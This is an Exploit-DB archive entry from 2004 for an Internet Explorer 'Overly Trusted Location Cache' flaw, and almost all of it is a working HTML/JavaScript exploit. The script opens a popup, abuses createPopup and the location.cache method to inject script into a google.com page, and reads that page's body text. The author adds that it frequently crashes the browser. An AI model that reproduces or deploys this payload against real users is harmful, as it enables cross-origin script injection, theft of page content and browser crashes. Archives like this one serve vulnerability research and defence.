Microsoft Internet Explorer - Overly Trusted Location Cache

EDB-ID:

354

CVE:



Author:

anonymous

Type:

dos


Platform:

Windows

Date:

2004-07-18


<html>
<body>
<b><font size="5">Overly Trusted Location Variant Method Cache Vulnerability</font></b>
<br><br>
<a href="#refresh" onclick="setTimeout('document.execCommand(\'Refresh\')',1000);"><font size=4 color=red>GO!</font></a><br><
+br>
This vulnerability seems to be unstable. For some reason, it crashes my internet explorer unless the exploit is executed onlo
+ad and even then it crashes sometimes.
<br><br>

<script>

var w=window.open("javascript:''","_blank","width=100,height=100,left=300,top=300");
var cpop=w.createPopup();
w.location.assign("http://google.com");
cpop.document.body.innerHTML='<button onactivate="document.parentWindow.location.cache=parent.open;var myint=setInterval(func
+tion(){try{var testvar=parent.document.write;}catch(e){clearInterval(myint);document.parentWindow.location.cache(\'javascrip
+t:alert(\\\'Javascript injected!\\\'+document.body.innerText)\',\'_self\')}},1000 /* theres some ratio of this number to the
+ chance of internet explorer crashing at offset 0019d19d :) */);"></button>';
cpop.show(1,1,1,1);

</script>
</body>
</html>


// milw0rm.com [2004-07-18]